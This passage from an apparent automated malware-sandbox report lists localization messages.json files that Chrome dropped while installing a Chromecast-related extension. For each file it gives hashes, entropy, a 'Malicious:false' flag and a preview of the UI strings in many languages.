                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Hindi gumagalaw".. },.. "1213957982723875920": {.. "message": "Alin sa sumusunod ang pinakamahusay na naglalarawan sa iyong network?".. },.. "128276876460319075": {.. "message": "Pagtuklas ng Device".. },.. "1428448869078126731": {.. "message": "Pagka-smooth ng Video".. },.. "1522140683318860351": {.. "message": "Hindi nakakonekta. Pakisubukang muli.".. },.. "1550904064710828958": {.. "message": "Smooth".. },.. "1636686747687494376": {.. "message": "Perpekto".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Nakikita mo ba ang iyong Chromecast sa $START_LINK$ Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15826
                                                                                                                                                                                Entropy (8bit):5.277877116547859
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:nLZprAZg3EkV3sjrICe8L/1Va7lt1rlxLAkoYHHavV6c8TEKdl:vrW+2jrI7TdLAk3MV6uml
                                                                                                                                                                                MD5:9B416146FE4F1403C2AACAC4DCF1A5C3
                                                                                                                                                                                SHA1:616F055C9FAD4CE972DF82EC8A9B2F4EDA3E7FAD
                                                                                                                                                                                SHA-256:7C7F5758F54008190ACCDDBD1761CBD980FB5FE0847E992874498228D2571DBC
                                                                                                                                                                                SHA-512:6E8E70380A8C6E2C0587ADFF6AE36963EC76694904841CE1DFE4EEE215B917AD3E8AF727555627FBDF6B8BA6A4A0674D2B90AC4E9331B6628A32F4C4348FB51B
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Se fige".. },.. "1213957982723875920": {.. "message": "Parmi les propositions suivantes, laquelle d.crit le mieux votre r.seau.?".. },.. "128276876460319075": {.. "message": "D.tection d'appareils".. },.. "1428448869078126731": {.. "message": "Fluidit. de la vid.o".. },.. "1522140683318860351": {.. "message": ".chec de la connexion. Veuillez r.essayer.".. },.. "1550904064710828958": {.. "message": "Fluide".. },.. "1636686747687494376": {.. "message": "Parfaite".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Votre Chromecast est-il visible dans l'$START_LINK$application Google.Home$END_LINK$.? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\gu\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):19255
                                                                                                                                                                                Entropy (8bit):5.32628732852814
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Hq2Mr+qPlJKYMdzKgXr3dGsGF+yAK37Wf7Cy/V6uml:KxzTVgX7ykj6uml
                                                                                                                                                                                MD5:68B03519786F71A426BAC24DECA2DD52
                                                                                                                                                                                SHA1:B8E6608932EC5CEC4BC3C5475BFC3E312D2E2E7D
                                                                                                                                                                                SHA-256:C77A4D27E9E6CA25B9290056D93A656E3EBE975957E4C2EE9F0FB11B133D5CD4
                                                                                                                                                                                SHA-512:5FFE06A10774877AF25E05BA07F3032CC52F874896D67E320F4EF9D524A22E40B462CC6206700E9557EB354FA2730172DC6912EBCA49C671FB0EF155B17F9EFF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "........... .... ..... .......... ....... ..... ... ..?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": "........ ......".. },.. "1522140683318860351": {.. "message": "....... ...... ..... .... ..... ..... ...... ....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".......".. },.. "1850397500312020388": {.. "message": "... ... $START_LINK$ Google Home ..$END_LINK$... Chromecast..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):19381
                                                                                                                                                                                Entropy (8bit):5.328912995891658
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:zrGrSmhKy7KyY+bNEDqlQdrMEPxtShJV6uml:zBqG6QdwEPrW6uml
                                                                                                                                                                                MD5:20C86E04B1833EA7F21C07361061420A
                                                                                                                                                                                SHA1:617C0D70E162CF380005E9780B61F650B7A39F9B
                                                                                                                                                                                SHA-256:C2C27CA242DBDE600BA3AA7782156BC2B190A64D8A1B51EDC8007BDECA139553
                                                                                                                                                                                SHA-512:9FB91AA8E0226519E298B1136E8A1A3C1879DB7F0E6052AF1BFD55921CD698346278D04602510680A9695A76DD5C96D9665380580044C50D81392BB2CB3E8E95
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "..... ... .. ... .... ....... .. .... ..... ..... .... ..?".. },.. "128276876460319075": {.. "message": "...... ...".. },.. "1428448869078126731": {.. "message": "...... .........".. },.. "1522140683318860351": {.. "message": "....... ..... ..... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": ".... .. $START_LINK$ Google Home .........$END_LINK$ ... .... Ch
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15507
                                                                                                                                                                                Entropy (8bit):5.290847699527565
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Pdapr6h85tRwVQgkvJryLkla5Kfndg/V6c8TEKdl:Arwot2Q7BryVce/V6uml
                                                                                                                                                                                MD5:3ED90E66789927D80B42346BB431431E
                                                                                                                                                                                SHA1:2B061E3271DF4255B1FFC47BDB207CDEC0D9724F
                                                                                                                                                                                SHA-256:0B41E3C42414F72C9A12C05F8772597F9685115366A774C66018467AD4B71A74
                                                                                                                                                                                SHA-512:92BE43F1FFC8EFBF5BBC50573AC4C65F6104416A5B6CD04404C3A9854CA3DCF2A43A4044C168590CDF83887D234495843572331ADCD5B020D2E48A3956F3C164
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzavanje".. },.. "1213957982723875920": {.. "message": "Koje od sljede.eg najbolje opisuje va.u mre.u?".. },.. "128276876460319075": {.. "message": "Otkrivanje ure.aja".. },.. "1428448869078126731": {.. "message": "Ujedna.enost videoreprodukcije".. },.. "1522140683318860351": {.. "message": "Povezivanje nije uspjelo. Poku.ajte ponovo.".. },.. "1550904064710828958": {.. "message": "Glatko".. },.. "1636686747687494376": {.. "message": "Savr.ena".. },.. "1802762746589457177": {.. "message": "Glasno.a".. },.. "1850397500312020388": {.. "message": "Vidite li svoj Chromecast u $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15682
                                                                                                                                                                                Entropy (8bit):5.354505633120392
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:CCEAproS9fZv+JwkDMrC2NSxoSgbV6c8TEKdl:5r5VZv+RDMrazoV6uml
                                                                                                                                                                                MD5:8E9FF7E49473C5734A2F6F0812E12EB3
                                                                                                                                                                                SHA1:A4F10DDD1580582533D5EB59EDF6D8048F887C81
                                                                                                                                                                                SHA-256:6CDD2FB39ADECE00E88B989E464B05ED1414092D0492F6D0AE58D549BFD1A46A
                                                                                                                                                                                SHA-512:E9A4AF31B1A276F395599BB620A3164CABF3459F3C102DD3F57DFEA734510BD985DE65CB409E1975559ACCC615075439A08E1DEBE22C90A0ABCAA3CAFEE79AC7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Lefagy".. },.. "1213957982723875920": {.. "message": "Az al.bbiak k.z.l melyik jellemzi legjobban h.l.zat.t?".. },.. "128276876460319075": {.. "message": "Eszk.zfelfedez.s".. },.. "1428448869078126731": {.. "message": "Vide. folyamatoss.ga".. },.. "1522140683318860351": {.. "message": "Sikertelen kapcsol.d.s. K.rj.k, pr.b.lja .jra.".. },.. "1550904064710828958": {.. "message": "Folyamatos".. },.. "1636686747687494376": {.. "message": "T.k.letes".. },.. "1802762746589457177": {.. "message": "Hanger.".. },.. "1850397500312020388": {.. "message": "L.tja a Chromecastot a $START_LINK$Google Home alkalmaz.sban$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15070
                                                                                                                                                                                Entropy (8bit):5.190057470347349
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:GsprMtChjkWfrEWL0KRCnEOWV6c8TEKdl:9rtAEr3LTRuWV6uml
                                                                                                                                                                                MD5:7ADF9F2048944821F93879336EB61A78
                                                                                                                                                                                SHA1:C3DA74FB544684D5B250767BB0CB66FFB7C58963
                                                                                                                                                                                SHA-256:3630947E1075E3663AD3E4824D0BE42CB47C0D615D8053E83B9595047C8BA9BE
                                                                                                                                                                                SHA-512:1F28BB80E1839C5581106BEA3AE2501C7618249D7E3115819F5A9A87771D59F5DE346C1B9C87F7FFC390604D5B9888CE738E25F2F04A094002A0FB3B22CBEC95
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Membeku".. },.. "1213957982723875920": {.. "message": "Dari berikut ini, manakah yang paling mendeskripsikan jaringan Anda?".. },.. "128276876460319075": {.. "message": "Penemuan Perangkat".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Coba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Bisakah Anda melihat Chromecast di $START_LINK$aplikasi Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15256
                                                                                                                                                                                Entropy (8bit):5.210663765771143
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:lYprk52dAaykVza8rE0QWBKD9+vq0hKEV6c8TEKdl:qrlA8r6DalV6uml
                                                                                                                                                                                MD5:BB3041A2B485B900F623E57459AE698A
                                                                                                                                                                                SHA1:502F5EA89F9FB0287E864B240EA39889D72053A4
                                                                                                                                                                                SHA-256:025737EF8FA06706B3F26D0F52B4844244A6D33DAE1D82FEF2931A14C003D57E
                                                                                                                                                                                SHA-512:BA51784073BEF82F3A116B33DA406FDB10EC823B9EE74375C46036DAD8BDCB4141F60845DE141ABE42CEEF9251572F6AB287CA5FC7669C60E4F68071D5AB8C2D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Si blocca".. },.. "1213957982723875920": {.. "message": "Quale delle seguenti definizioni descrive meglio la tua rete?".. },.. "128276876460319075": {.. "message": "Rilevamento dispositivi".. },.. "1428448869078126731": {.. "message": "Uniformit. video".. },.. "1522140683318860351": {.. "message": "Connessione non riuscita. Riprova.".. },.. "1550904064710828958": {.. "message": "Fluido".. },.. "1636686747687494376": {.. "message": "Perfetta".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Riesci a vedere il tuo dispositivo Chromecast nell'$START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\iw\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):18990
                                                                                                                                                                                Entropy (8bit):4.903564947699091
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:xkQ0XrEGOhGUkT/Mf8eZrNj27tS+iiUfOkGEyWiycLSK8eL+D75J4X:KdrgGvDMEeZrM78fQVLZqDA
                                                                                                                                                                                MD5:A991BEF47A83913A1E0EF06007D09198
                                                                                                                                                                                SHA1:80BA1E8FC3E9BE8A34F73E78CED8313E54F9CC96
                                                                                                                                                                                SHA-256:0F95D8BF550F14B2B704CE42911F5BD23FA9FE28D0D301F66628848B27C760CB
                                                                                                                                                                                SHA-512:1B5C8196669088A884FD8E117E7EB0870B296AF493004F948D0AD4FF630B07A34F423647E55856307029B2B06CDCCEAED2F9C43B426200D28D8A19A48CEA5D42
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {"1018984561488520517": {"message": "\u05e7\u05d5\u05e4\u05d0"}, "1213957982723875920": {"message": "\u05d0\u05d9\u05d6\u05d4 \u05de\u05d4\u05de\u05e9\u05e4\u05d8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd \u05de\u05ea\u05d0\u05e8 \u05d0\u05ea \u05d4\u05e8\u05e9\u05ea \u05e9\u05dc\u05da \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d4\u05d8\u05d5\u05d1\u05d4 \u05d1\u05d9\u05d5\u05ea\u05e8?"}, "128276876460319075": {"message": "\u05d2\u05d9\u05dc\u05d5\u05d9 \u05de\u05db\u05e9\u05d9\u05e8\u05d9\u05dd"}, "1428448869078126731": {"message": "\u05d0\u05d9\u05db\u05d5\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05d5\u05d5\u05d9\u05d3\u05d0\u05d5"}, "1522140683318860351": {"message": "\u05d4\u05d7\u05d9\u05d1\u05d5\u05e8 \u05e0\u05db\u05e9\u05dc. \u05e0\u05e1\u05d4 \u05e9\u05d5\u05d1."}, "1550904064710828958": {"message": "\u05d7\u05dc\u05e7"}, "1636686747687494376": {"message": "\u05de\u05e2\u05d5\u05dc\u05d4"}, "1802762746589457177": {"message": "\u05e2\u05d5\u05e6\u05de\u05ea \u05e7\u05d5\u05dc"}, "
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):16519
                                                                                                                                                                                Entropy (8bit):5.675556017051063
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:nkprPhQdxkRWrZe1wYpMR5wnAV6c8TEKdl:YrLRWri65wAV6uml
                                                                                                                                                                                MD5:6F2CC1A6B258DF45F519BA24149FABDC
                                                                                                                                                                                SHA1:8A58C7880C6D22765DCBB6BCE22A192C1B109AE1
                                                                                                                                                                                SHA-256:42ECFEE727CFC4F2845FEFDACE5EDC2E0A40AFAD69973A3B950CE653A7633342
                                                                                                                                                                                SHA-512:F7454F0E14301C59CC54361ACC0A1C6D072EF9BDF5DEA60646FB90B1CE47612785938C784A4CF1DE3E62648A14420374933B5F5DA43907BC00D3799FF163A3D0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": "................................".. },.. "128276876460319075": {.. "message": "......".. },.. "1428448869078126731": {.. "message": ".......".. },.. "1522140683318860351": {.. "message": ".......................".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home ...$END_LINK$. Chromecast .........$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\kn\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20406
                                                                                                                                                                                Entropy (8bit):5.312117131662377
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:a6C5rBSzvrZreGnla9ZBHRUDYr9yRwEcAa4rSeD5BSz0hJz8qbbM3gbr//Hkr44c:a6C5rBSzvFreGnla9ZBHRUDYr9yRwEcC
                                                                                                                                                                                MD5:2E3239FC277287810BC88D93A6691B09
                                                                                                                                                                                SHA1:FC5D585DA00ADC90BF79109C7377BD55E6653569
                                                                                                                                                                                SHA-256:5FC705AD19761204D8604EA069936A23731B055D51E7836CAAF16AC7719FBEEA
                                                                                                                                                                                SHA-512:DF8BC9E577D3ECB0E6C303E1D2C9E9A4A8317CAE810A9DFC88D91B373A4B665722C5A9AB5A589BB947FDA4C7CD9A6DF39DDD13EA47FE9EFF7E0AC43E49FF3479
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "...... ...... ..... ........... ..... ......... ............?".. },.. "128276876460319075": {.. "message": "..... ........".. },.. "1428448869078126731": {.. "message": "........ .......".. },.. "1522140683318860351": {.. "message": "...... ........... ........ ..... ...........".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".... $
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15480
                                                                                                                                                                                Entropy (8bit):5.617756574352461
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:kWprGvSQtkxWffrnl5JuFBWVZV6c8TEKdl:TrkuxKfrlT4YVZV6uml
                                                                                                                                                                                MD5:E303CD63AD00EB3154431DED78E871C4
                                                                                                                                                                                SHA1:3B1E5B8E2CF5EBDF5D33656EF80A46563F751783
                                                                                                                                                                                SHA-256:FDE602BFDB1AFD282682DA5338C4F91D8A2F6CB5411DB8F62F4583D629CE67A6
                                                                                                                                                                                SHA-512:18BA1D5A25FBC1829AD957A531B0CC490AFCBD20AC22181021363AA3CFB916270B8732E824463C9B0897220E8AE86EB1BE561D6540E6C625F08F228F61DDFFA3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": ".. . .. .. ..... .. . .... ... .....?".. },.. "128276876460319075": {.. "message": ".. ..".. },.. "1428448869078126731": {.. "message": "... ..".. },.. "1522140683318860351": {.. "message": ".... ...... .. ... ....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "...".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home .$END_LINK$. Chromecast. .....? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15802
                                                                                                                                                                                Entropy (8bit):5.354550839818046
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:lGxSprfkiRR+2zJckS1khrnPI85+80p3DWReV6c8TEKdl:lG4rlq0OkSmhrwbpIeV6uml
                                                                                                                                                                                MD5:93BBBE82F024FBCB7FB18E203F253429
                                                                                                                                                                                SHA1:83F4D80F64FA2ADCE6C515C5F663BD38A76C51DB
                                                                                                                                                                                SHA-256:E7A8570922CCC4F2CA3721C4E61F426158C4E7BC90274FBC8BE4040FF8B6CA9B
                                                                                                                                                                                SHA-512:B7E7878106B466CE95069141DF1DE387E847348B62E9C4D548006452F3E164B3AD842E9673A56DC011A5ECC3346B5863E2034EE477A9D1F3E0ABD76B2D0F640A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Stringa".. },.. "1213957982723875920": {.. "message": "Kuris i. toliau pateikt. teigini. geriausiai apib.dina j.s. tinkl.?".. },.. "128276876460319075": {.. "message": ".renginio suradimas".. },.. "1428448869078126731": {.. "message": "Vaizdo .ra.o sklandumas".. },.. "1522140683318860351": {.. "message": ".vyko ry.io klaida. Bandykite dar kart..".. },.. "1550904064710828958": {.. "message": "Leid.iama skland.iai".. },.. "1636686747687494376": {.. "message": "Puiki".. },.. "1802762746589457177": {.. "message": "Garsumas".. },.. "1850397500312020388": {.. "message": "Ar .Chromecast. rodomas $START_LINK$programoje .Google Home.$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):15891
                                                                                                                                                                                Entropy (8bit):5.36794040601742
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:y18prUkm15wkLDG2raqhnZDuvyI762V6c8TEKdl:RrAL7rte62V6uml
                                                                                                                                                                                MD5:388590CE5E144AE5467FD6585073BD11
                                                                                                                                                                                SHA1:61228673A400A98D5834389C06127589F19D3A30
                                                                                                                                                                                SHA-256:05CA14196CA5D90B228C0F03684E03EBE403A3E7B513AE0A059244AE12B51164
                                                                                                                                                                                SHA-512:BF83AC90BC56CEB1CA12DCB47BCE542FB8CFE0BC14E34DE4FE1A84F7CDB4B54E36C125CEA7EE06EA6244F7795A0957A8A20DB30CA4C60FC6E96EF2A735448521
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".Iesald.ts. att.ls".. },.. "1213957982723875920": {.. "message": "Kur. no t.l.k min.tajiem apgalvojumiem vislab.k raksturo j.su t.klu?".. },.. "128276876460319075": {.. "message": "Ier.ces atra.ana".. },.. "1428448869078126731": {.. "message": "Video vienm.r.ba".. },.. "1522140683318860351": {.. "message": "Neizdev.s izveidot savienojumu. L.dzu, m..iniet v.lreiz.".. },.. "1550904064710828958": {.. "message": "Vienm.r.gs att.ls".. },.. "1636686747687494376": {.. "message": "Nevainojama".. },.. "1802762746589457177": {.. "message": "Ska.ums".. },.. "1850397500312020388": {.. "message": "Vai j.su Chromecast ier.ce ir redzama $START_LINK$lietotn. Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2"..
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\ml\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):20986
                                                                                                                                                                                Entropy (8bit):5.347122984404251
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:6pQrdbhWHZ3wOn1HbxytQdroExFVRnTPV6uml:X5hUtz6uml
                                                                                                                                                                                MD5:2AF93901DE80CA49DA869188BCDA9495
                                                                                                                                                                                SHA1:E60DF4F2FB12BD3F1CA869DAD9F6BDE0C17CEB11
                                                                                                                                                                                SHA-256:329E80AEE1212F634E180DEF7E16D6E38D9C9FDA9AC9DB1D99B8AE1626EF304E
                                                                                                                                                                                SHA-512:DD1711B017DC65E1272972A1BEBD7A1B1769E1F22B37B20582573392CD432725D19DCE134145B3C031428BC0B5948B02A9AA93C8A651BEAA189B686B7BC2AD46
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "...........".. },.. "1213957982723875920": {.. "message": "................ ..... ....... ...... ....... ......... ............. .................?".. },.. "128276876460319075": {.. "message": "...... .........".. },.. "1428448869078126731": {.. "message": "...... ...............".. },.. "1522140683318860351": {.. "message": "...... .............. ....... ...........".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message"
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir5800_708737030\CRX_INSTALL\_locales\mr\messages.json
                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):19628
                                                                                                                                                                                Entropy (8bit):5.311054092888986
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:PbrpprGy+RmIosTmidpzlF1Akk03LQYOkQrjNjP8hZYiEQ5z+excV6c8TEKdl:PbfrGUIos7dpzxbP7KrjNjaBEYuV6uml
                                                                                                                                                                                MD5:659F5B4ACA112D3ECBB6EC1613DDE824
                                                                                                                                                                                SHA1:5DEE35FCD260554999F8DDEC489FBA9F81FA8EEE
                                                                                                                                                                                SHA-256:C8B765E7A07578BC078A952E151E3B866506959E15E79E9E5E1DBB98F9C4008F
                                                                                                                                                                                SHA-512:F74B36C1B6160E444F4969D13788A9C60637BDC11DC5065B2518B668E8D638384E00557ACDC88B3EA225D9231B6BED4B227BFB2E12C92773073B256F62ADDE63
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
